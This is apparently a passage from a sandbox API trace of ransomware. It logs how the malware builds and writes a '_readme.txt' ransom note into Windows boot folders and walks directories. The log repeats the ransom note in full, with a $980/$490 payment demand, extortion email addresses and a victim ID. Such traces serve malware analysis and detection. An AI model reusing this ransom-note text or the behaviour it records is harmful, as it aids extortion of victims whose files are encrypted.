photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0094.050] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0094.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0094.050] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\_readme.txt" (normalized: "c:\\boot\\ko-kr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0094.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0094.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0094.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0094.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0094.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0094.051] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0094.051] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0094.053] CloseHandle (hObject=0x5c8) returned 1 [0094.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0094.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0094.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0094.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.053] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1989b40, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1989b40, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.054] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1989b40, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1989b40, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.054] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0094.054] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1989b40, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1989b40, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1989b40, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0094.054] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1989b40, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1989b40, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1989b40, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0094.054] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0094.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0094.055] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.058] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0094.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.058] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0094.058] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.058] PathFindFileNameW (pszPath="") returned="" [0094.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.058] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0094.060] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0094.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0094.060] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0094.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b79750 [0094.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.061] FreeLibrary (hLibModule=0x75670000) returned 1 [0094.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0094.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x9b79750 [0094.061] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0094.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.062] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 0 [0094.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0094.062] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0094.062] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0094.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0094.062] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\_readme.txt" (normalized: "c:\\boot\\nb-no\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0094.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0094.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0094.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0094.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0094.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0094.063] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0094.063] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0094.065] CloseHandle (hObject=0x5c8) returned 1 [0094.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, 